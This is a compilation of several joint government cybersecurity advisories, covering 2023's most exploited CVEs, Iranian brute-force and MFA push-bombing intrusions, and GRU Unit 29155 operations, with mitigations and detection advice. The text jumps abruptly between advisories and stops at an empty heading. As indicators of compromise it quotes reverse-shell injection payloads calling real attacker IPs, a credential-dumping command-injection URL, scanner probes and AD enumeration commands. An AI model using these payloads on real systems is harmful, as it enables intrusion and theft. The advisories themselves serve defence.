The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies):

• United States: The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and National Security Agency (NSA)
• Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
• Canada: Canadian Centre for Cyber Security (CCCS)
• New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
• United Kingdom: National Cyber Security Centre (NCSC-UK)

This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.

The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the following recommendations, and those found within the Mitigations section of this advisory, to reduce the risk of compromise by malicious cyber actors.

• Vendors, designers, and developers. Implement secure by design and default principles and tactics to reduce the prevalence of vulnerabilities in your software.
  • Follow the SP 800-218 Secure Software Development Framework (SSDF) and implement secure by design practices into each stage of the software development life cycle (SDLC). Establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.
  • Prioritize secure by default configurations, such as eliminating default passwords and not requiring additional configuration changes to enhance product security.
  • Ensure that published CVEs include the proper CWE field, identifying the root cause of the vulnerability.
• End-user organizations:
  • Apply timely patches to systems.
    Note: If CVEs identified in this advisory have not been patched, check for signs of compromise before patching.
  • Implement a centralized patch management system.
  • Use security tools such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers.
  • Ask your software providers to discuss their secure by design program, provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings.

Purpose

The authoring agencies developed this document in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

Download the PDF version of this report:

Technical Details

Key Findings

In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets. In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day. 

Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability. The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.

Cybersecurity Efforts to Include

Implementing security-centered product development lifecycles. Software developers deploying patches to fix software vulnerabilities is often a lengthy and expensive process, particularly for zero-days. The use of more robust testing environments and implementing threat modeling throughout the product development lifecycle will likely reduce overall product vulnerabilities.

Increasing incentives for responsible vulnerability disclosure. Global efforts to reduce barriers to responsible vulnerability disclosure could restrict the utility of zero-day exploits used by malicious cyber actors. For example, instituting vulnerability reporting bug bounty programs that allow researchers to receive compensation and recognition for their contributions to vulnerability research may boost disclosures.

Using sophisticated endpoint detection and response (EDR) tools. End users leveraging EDR solutions may improve the detection rate of zero-day exploits. Most zero-day exploits, including at least three of the top 15 vulnerabilities from last year, have been discovered when an end user or EDR system reports suspicious activity or unusual device malfunctions.

Top Routinely Exploited Vulnerabilities

Listed in Table 1 are the top 15 vulnerabilities the authoring agencies observed malicious cyber actors routinely exploiting in 2023 with details also discussed below.

• CVE-2023-3519: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway.
  • Allows an unauthenticated user to cause a stack buffer overflow in the NSPPE process by using a HTTP GET request.
• CVE-2023-4966: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway.
  • Allows session token leakage; a proof-of-concept for this exploit was revealed in October 2023.
• CVE-2023-20198: This vulnerability affects Cisco IOS XE Web UI.
  • Allows unauthorized users to gain initial access and issue a command to create a local user and password combination, resulting in the ability to log in with normal user access.
• CVE-2023-20273: This vulnerability affects Cisco IOS XE, following activity from CVE-2023-20198.
  • Allows privilege escalation, once a local user has been created, to root privileges.
• CVE-2023-27997: This vulnerability affects Fortinet FortiOS and FortiProxy SSL-VPN.
  • Allows a remote user to craft specific requests to execute arbitrary code or commands.
• CVE-2023-34362: This vulnerability affects Progress MOVEit Transfer.
  • Allows abuse of an SQL injection vulnerability to obtain a sysadmin API access token.
  • Allows a malicious cyber actor to obtain remote code execution via this access by abusing a deserialization call.
• CVE-2023-22515: This vulnerability affects Atlassian Confluence Data Center and Server.
  • Allows exploit of an improper input validation issue.
    • Arbitrary HTTP parameters can be translated into getter/setter sequences via the XWorks2 middleware and, in turn, allow Java objects to be modified at run time.
    • The exploit creates a new administrator user and uploads a malicious plugin to get arbitrary code execution.
• CVE-2021-44228: This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open source logging framework incorporated into thousands of products worldwide.
  •  Allows the execution of arbitrary code.
    • An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code.
    • The request allows a cyber actor to take full control of a system.
    • The actor can then steal information, launch ransomware, or conduct other malicious activity.
    • Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021.
• CVE-2023-2868: This is a remote command injection vulnerability that affects the Barracuda Networks Email Security Gateway (ESG) Appliance.
  • Allows an individual to obtain unauthorized access and remotely execute system commands via the ESG appliance.
• CVE-2022-47966: This is an unauthenticated remote code execution vulnerability that affects multiple products using Zoho ManageEngine.
  • Allows an unauthenticated user to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint.
• CVE-2023-27350: This vulnerability affects PaperCut MF/NG.
  • Allows a malicious cyber actor to chain an authentication bypass vulnerability with the abuse of built-in scripting functionality to execute code.
• CVE-2020-1472: This vulnerability affects Microsoft Netlogon.
  • Allows privilege escalation.
    • An unauthorized user may use non-default configurations to establish a vulnerable Netlogon secure channel connection to a domain controller by using the Netlogon Remote Protocol.
      Note: This CVE has been included in top routinely exploited vulnerabilities lists since 2021.
• CVE-2023-42793: This vulnerability can affect JetBrains TeamCity servers.
  • Allows authentication bypass that allows remote code execution against vulnerable JetBrains TeamCity servers.
• CVE-2023-23397: This vulnerability affects Microsoft Office Outlook.
  • Allows elevation of privilege.
    • A threat actor can send a specially crafted email that the Outlook client will automatically trigger when Outlook processes it.
    • This exploit occurs even without user interaction.
• CVE-2023-49103: This vulnerability affects ownCloud graphapi.
  • Allows unauthenticated information disclosure.
    • An unauthenticated user can access sensitive data such as admin passwords, mail server credentials, and license keys.

CISA encourages users and administrators to review the following and apply necessary updates:

• Microsoft Security Update Guide for October

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) are releasing this joint Cybersecurity Advisory to warn network defenders of Iranian cyber actors’ use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors. The actors likely aim to obtain credentials and information describing the victim’s network that can then be sold to enable access to cybercriminals.

Since October 2023, Iranian actors have used brute force, such as password spraying, and multifactor authentication (MFA) ‘push bombing’ to compromise user accounts and obtain access to organizations. The actors frequently modified MFA registrations, enabling persistent access. The actors performed discovery on the compromised networks to obtain additional credentials and identify other information that could be used to gain additional points of access. The authoring agencies assess the Iranian actors sell this information on cybercriminal forums to actors who may use the information to conduct additional malicious activity.

This advisory provides the actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). The information is derived from FBI engagements with entities impacted by this malicious activity.

The authoring agencies recommend critical infrastructure organizations follow the guidance provided in the Mitigations section. At a minimum, organizations should ensure all accounts use strong passwords and register a second form of authentication.

Download the PDF version of this report:

For a downloadable list of IOCs, see:

Technical Details

Note: This advisory uses the MITRE ATT&CK^® for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section in Appendix A for a table of the actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Overview of Activity

The actors likely conduct reconnaissance operations to gather victim identity [T1589] information. Once obtained, the actors gain persistent access to victim networks frequently via brute force [T1110]. After gaining access, the actors use a variety of techniques to further gather credentials, escalate privileges, and gain information about the entity’s systems and network. The actors also move laterally and download information that could assist other actors with access and exploitation.

Initial Access and Persistence

The actors use valid user and group email accounts [T1078], frequently obtained via brute force such as password spraying [T1110.003] although other times via unknown methods, to obtain initial access to Microsoft 365, Azure [T1078.004], and Citrix systems [T1133]. In some cases where push notification-based MFA was enabled, the actors send MFA requests to legitimate users seeking acceptance of the request. This technique—bombarding users with mobile phone push notifications until the user either approves the request by accident or stops the notifications— is known as “MFA fatigue” or “push bombing” [T1621].

Once the threat actors gain access to an account, they frequently register their devices with MFA to protect their access to the environment via the valid account:

• In two confirmed compromises, the actors leveraged a compromised user’s open registration for MFA [T1556.006] to register the actor’s own device [T1098.005] to access the environment.
• In another confirmed compromise, the actors used a self-service password reset (SSPR) tool associated with a public facing Active Directory Federation Service (ADFS) to reset the accounts with expired passwords [T1484.002] and then registered MFA through Okta for compromised accounts without MFA already enabled [T1556] [T1556.006].

The actors frequently conduct their activity using a virtual private network (VPN) service [T1572]. Several of the IP addresses in the actors’ malicious activity originate from exit nodes tied to the Private Internet Access VPN service.

Lateral Movement

The actors use Remote Desktop Protocol (RDP) for lateral movement [T1021.001]. In one instance, the actors used Microsoft Word to open PowerShell to launch the RDP binary mstsc.exe [T1202].

Credential Access

The actors likely use open-source tools and methodologies to gather more credentials. The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Kerberos tickets [T1558.003]. In one instance, the actors used the Active Directory (AD) Microsoft Graph Application Program Interface (API) PowerShell application likely to perform a directory dump of all AD accounts. Also, the actors imported the tool [T1105] DomainPasswordSpray.ps1, which is openly available on GitHub [T1588.002], likely to conduct password spraying. The actors also used the command Cmdkey /list, likely to display usernames and credentials [T1555].

Privilege Escalation

In one instance, the actors attempted impersonation of the domain controller, likely by exploiting Microsoft’s Netlogon (also known as ”Zerologon”) privilege escalation vulnerability (CVE-2020-1472) [T1068].

Discovery

The actors leverage living off the land (LOTL) to gain knowledge about the target systems and internal networks. The actors used the following Windows command-line tools to gather information about domain controllers [T1018], trusted domains [T1482], lists of domain administrators, and enterprise administrators [T1087.002] [T1069.002] [T1069.003]:

• Nltest /dclist
• Nltest /domain_trusts
• Nltest /domain_trusts/all_trusts
• Net group “Enterprise admins” /domain
• Net group “Domain admins” /domain

Next, the actors used the following Lightweight Directory Access Protocol (LDAP) query in PowerShell [T1059.001]to search the AD for computer display names, operating systems, descriptions, and distinguished names [T1082].

                                           $i=0
                                           $D= [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
                                           $L='LDAP://' . $D
                                           $D = [ADSI]$L
                                           $Date = $((Get-Date).AddDays(-90).ToFileTime())
                                           $str = '(&(objectcategory=computer)(operatingSystem=*serv*)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))'
                                           $s = [adsisearcher]$str
                                           $s.searchRoot = $L.$D.distinguishedName
                                           $s.PropertiesToLoad.Add('cn') > $Null
                                           $s.PropertiesToLoad.Add('operatingsystem') > $Null
                                           $s.PropertiesToLoad.Add('description') > $Null
                                           $s.PropertiesToLoad.Add('distinguishedName') > $Null
                                           Foreach ($CA in $s.FindAll()) {
                                                         Write-Host $CA.Properties.Item('cn')
                                                         $CA.Properties.Item('operatingsystem')
                                                         $CA. Properties.Item('description')
                                                         $CA.Properties.Item('distinguishedName')
                                                         $i++
                                           }
                                           Write-host Total servers: $i

Command and Control

On one occasion, using msedge.exe, the actors likely made outbound connections to Cobalt Strike Beacon command and control (C2) infrastructure [T1071.001].

Exfiltration and Collection

In a couple instances, while logged in to victim accounts, the actors downloaded files related to gaining remote access to the organization and to the organization’s inventory [T1005], likely exfiltrating the files to further persist in the victim network or to sell the information online.

Detection

To detect brute force activity, the authoring agencies recommend reviewing authentication logs for system and application login failures of valid accounts and looking for multiple, failed authentication attempts across all accounts.

To detect the use of compromised credentials in combination with virtual infrastructure, the authoring agencies recommend the following steps:

• Look for “impossible logins,” such as suspicious logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the user’s expected geographic location.
• Look for one IP used for multiple accounts, excluding expected logins.
• Look for “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses with significant geographic distance (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the period between the logins). Note: Implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks.
• Look for MFA registrations with MFA in unexpected locales or from unfamiliar devices.
• Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the ntds.dit file from a domain controller.
• Look for suspicious privileged account use after resetting passwords or applying user account mitigations.
• Look for unusual activity in typically dormant accounts.
• Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.

Mitigations

The authoring agencies recommend organizations implement the mitigations below to improve organizations’ cybersecurity posture based on the actors’ TTPs described in this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA. The CPGs, which are organized to align to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, are a subset of cybersecurity practices, aimed at meaningfully reducing risks to both critical infrastructure operations and the American people. These voluntary CPGs strive to help small- and medium-sized organizations kick-start their cybersecurity efforts by prioritizing investment in a limited number of essential actions with high-impact security outcomes. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

• Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy for user verification or password strength, creating a security gap. Avoid common passwords (e.g. “Spring2024” or “Password123!”).
• Disable user accounts and access to organizational resources for departing staff [CPG 2.D]. Disabling accounts can minimize system exposure, removing options actors can leverage for entry into the system. Similarly, create new user accounts as close as possible to an employee’s start date.
• Implement phishing-resistant MFA [CPG 2.H]. See CISA’s resources Phishing-Resistant Multifactor Authentication and More than a Password for additional information on strengthening user credentials.
• Continuously review MFA settings to ensure coverage over all active, internet-facing protocols to ensure no exploitable services are exposed [CPG 2.W].
• Provide basic cybersecurity training to users [CPG 2.I] covering concepts such as:
  • Detecting unsuccessful login attempts [CPG 2.G].
  • Having users deny MFA requests they have not generated.
  • Ensuring users with MFA-enabled accounts have MFA set up appropriately.
• Ensure password policies align with the latest NIST Digital Identity Guidelines.
  • Meeting the minimum password strength [CPG 2.B] by creating a password using 8-64 nonstandard characters and long passphrases, when possible.
• Disable the use of RC4 for Kerberos authentication.

These mitigations apply to critical infrastructure entities across sectors.

The authoring agencies also recommend software manufacturers incorporate secure by design principles and tactics into their software development practices to protect their customers against actors using compromised credentials, thereby strengthening the security posture of their customers.  For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.

Validate Security Controls

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating organization security programs against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Table 1 to Table 12).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Contact Information

Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:

• CISA via CISA’s 24/7 Operations Center [report@cisa.gov or 1-844-Say-CISA (1-844-729-2472)] or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
• For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.

Intrusion events connected to this Iranian group may also include a different set of cyber actors–likely the third-party actors who purchased access from the Iranian group via cybercriminal forums or other channels. As a result, some TTPs and IOCs noted in this advisory may be tied to these third-party actors, not the Iranian actors. The TTPs and IOCs are in the advisory to provide recipients the most complete picture of malicious activity that may be observed on compromised networks. However, exercise caution if formulating attribution assessments based solely on matching TTPs and IOCs.

Version History

October 16, 2024: Initial version.

Appendix A: MITRE ATT&CK Tactics and Techniques

See Tables 1–12 for all referenced actors’ tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

• CVE-2024-8963 Ivanti Cloud Services Appliance (CSA) Path Traversal Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.

To mitigate this malicious cyber activity, organizations should take the following actions today:

• Prioritize routine system updates and remediate known exploited vulnerabilities.
• Segment networks to prevent the spread of malicious activity.
• Enable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for webmail, virtual private networks (VPNs), and accounts that access critical systems.

This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors—both during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022.

FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020:

• U.S. Department of the Treasury
• U.S. Department of State (Rewards for Justice)
• U.S. Cyber Command Cyber National Mission Force (CNMF)
• Netherlands Defence Intelligence and Security Service (MIVD)
• Czech Military Intelligence (VZ)
• Czech Republic Security Information Service (BIS)
• German Federal Office for the Protection of the Constitution (BfV)
• Estonian Internal Security Service (KAPO)
• Latvian State Security Service (VDD)
• Security Service of Ukraine (SBU)
• Computer Emergency Response Team of Ukraine (CERT-UA)
• Canadian Security Intelligence Service (CSIS)
• Communications Security Establishment Canada (CSE)
• Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
• United Kingdom National Cyber Security Centre (NCSC-UK)

For additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S. Department of Justice (DOJ) press releases for June 26, 2024, and September 5, 2024, FBI’s Cyber Crime webpage, and CISA’s Russia Cyber Threat Overview and Advisories webpage.

Download the PDF version of this report:

For a downloadable copy of indicators of compromise (IOCs):

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

GRU Unit 29155: Cyber Component

FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data [T1485].

FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations.

Cybersecurity Industry Tracking

The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to Unit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G1003 and commonly used within the cybersecurity community.

• Cadet Blizzard (formerly known as DEV-0586 by Microsoft)[1],[2]
• Ember Bear (also known as Bleeding Bear by CrowdStrike)[3]
• Frozenvista
• UNC2589[4]
• UAC-0056[5]

Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. Government’s understanding for all activity related to these groupings.

Victimization

In addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as well as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website defacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release exfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine.

To date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several additional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim information.

Whether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries.

TTP Overview

Reconnaissance

Unit 29155 cyber actors have been observed targeting IP ranges [T1595.001] used within multiple government and critical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning [T1595] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their intended purpose. Note: Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

• Acunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6]
• Amass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites [T1590.002].[7]
• Droopescan[8]
• JoomScan[9]
• MASSCAN: Unit 29155 cyber actors used MASSCAN and Nmap to discover other machines once inside victim networks.[10]
• Netcat[11]
• Nmap: Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the Nmap Scripting Engine [NSE]) to write custom scripts for discovering and scanning other machines [T1046].
• Shodan: Unit 29155 cyber actors used Shodan to identify hosts with a specific set of vulnerabilities or device types [T1596.005].[12]
• VirusTotal[13]
• WPScan

Additionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration [T1572] over port 1194, and in some instances, to perform Active Directory (AD) enumeration. Adminer in combination with Impacket and ldapdomaindump were tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands:

GET /index.php?log=to@example.com>%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me

"GET /CMS/files/log.htm HTTP/1.1" * * "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e "gethostbyname('hitccruvbrumn76c1b.bxss.me')")"

As the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs:

• CVE-2020-1472 (Microsoft: Windows Server)
• CVE-2021-26084 (Atlassian Confluence Server and Data Center)
• CVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing)
• CVE-2021-4034 (Red Hat: Polkit Privilege Escalation)
• CVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw)

Analysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190], as detailed throughout this advisory:

• CVE-2021-33044 (Dahua Security)
• CVE-2021-33045 (Dahua Security)
• CVE-2022-26134 (Atlassian Confluence Server and Data Center)
• CVE-2022-26138 (Atlassian Confluence Server and Data Center)
• CVE-2022-3236 (Sophos: Firewall)

Resource Development

Rather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to misattribution.

Unit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the opportunity to obtain various hacker tools such as malware and malware loaders [T1588.001] like Raspberry Robin and SaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of WhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis.

Initial Access

Unit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly attempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one instance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity authentication.

Lateral Movement

Unit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to authenticate to IP cameras with default usernames and passwords [T1078.001], and exfiltrating images [T1125] (JPG files). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext (as shown in Table 1 below) [T1552.001].

Appendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section.

Note: These events are independent and not correlated as a single timeline of compromise.

Event	Victim Observation
Web requests observed from victim infrastructure	These requests are likely intended to dump configuration settings and credentials [T1003]: hxxp://<IP>:<port>/PictureCatch.cgi?username=<NAME>&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED hxxp://<IP>:<port>/ssi.cgi/tmp/Login.htm
POST requests sent to victims with payloads [T1071.001]	"txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&chRemember=on&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d" "txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&chRemember=on&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F81.17.24.130%2F6870%200%3E%261%22))%7d"
URL encoded values from txtUser for both commands decoded to embedded bash commands	${@print(system("bash -i >& /dev/tcp/179.43.175.38/6870 0>&1"))} ${@print(system("bash -i >& /dev/tcp/81.17.24.130/6870 0>&1"))}

In addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below.

• In one instance shortly following a deployment of WhisperGate malware, Unit 29155 cyber actors exfiltrated data to mega[.]nz using Rclone [T1567.002].
• Unit 29155 cyber actors used a Pass-the-Hash [T1550.002] via ProxyChains.
• Cyber actors performed SSH and SSHPass executions.
• Cyber actors initiated a web request and executed commands via ProxyChains. This included obtaining NT hashes via Server Message Block (SMB) using smbclient, executing Windows Management Instrumentation (WMI) with hashes, and making web requests with resources i.php and tunnel.jsp. In one instance, cyber actors used smbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access internal databases.
• Cyber actors used Impacket for post-exploitation and lateral movement. The script secretsdump.py was used from the Impacket framework to obtain domain credentials, while psexec.py was subsequently used to move laterally within a victim network. 
• Cyber actors used ntlmrelayx.py via Impacket and krbrelayx.py, which requires Impacket to function.
• Cyber actors used Responder.py.
• Cyber actors used su-bruteforce to brute force a selected user using the su command.
• Cyber actors used BloodHound, an open source AD reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.
• Cyber actors used CrackMapExec via ProxyChains with SMB protocol targeting internal victim IP addresses. This open source post-exploitation tool automates assessing the security of large AD networks.
• Cyber actors used LinPEAS, an open source script designed to automate the process of searching for potential privilege escalation vulnerabilities on a Linux victim.
• Cyber actors used GO Simple Tunnel (GOST) (MD5: 896e0f54fc67d72d94b40d7885f10c51) for 30 days within one incident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure connections between clients and servers, allowing for secure data transmission over untrusted networks.
• Cyber actors used Through the Wire against a victim’s internet-facing Confluence server. Through the Wire is a proof of concept[14] exploit for CVE-2022-26134, an OGNL injection vulnerability allowing an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. All versions of Confluence Server and Data Center prior to the fixed versions listed by Atlassian are affected by this vulnerability.[15] A reverse shell over HTTPS was used to communicate over listening host on port 8081.
• Cyber actors initiated Nmap scans on localized web servers.
• Cyber actors performed lateral movement from compromised web servers to exploit a corporate Microsoft Windows network, commonly using psexec.py from the Impacket framework. The script secretsdump.py from the Impacket framework was used to obtain domain credentials.
• Cyber actors may have used Raspberry Robin malware in the role of an access broker [T1588.001].
• Cyber actors targeted victims’ Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords [T1110.003].

Command and Control

Infrastructure

